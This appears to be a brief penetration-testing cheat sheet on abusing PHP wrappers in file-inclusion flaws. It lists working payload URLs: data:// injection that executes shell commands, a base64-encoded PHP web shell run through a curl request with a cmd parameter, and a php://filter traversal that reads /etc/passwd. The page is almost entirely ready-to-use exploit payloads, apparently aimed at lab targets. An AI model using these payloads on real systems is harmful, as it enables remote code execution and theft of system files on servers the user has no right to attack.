PHP Wrappers
Identifying Vulnerability
http://192.168.112.132/menu.php?file=data:text/plain,helloworldExecuting commands
http://192.168.112.132/menu.php?file=data:text/plain,<?php echo shell_exec("dir") ?>Base64 Version of Above
echo -n '<?php echo system($_GET["cmd"]);?>' | base64
PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbImNtZCJdKTs/Pg==curl "http://mountaindesserts.com/meteor/index.php?page=data://text/plain;base64,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbImNtZCJdKTs/Pg==&cmd=ls"php filter
http://192.168.155.131/fileincl/example1.php?page=php://filter/convert.base64-encode/resource=../../../../../etc/passwdLast updated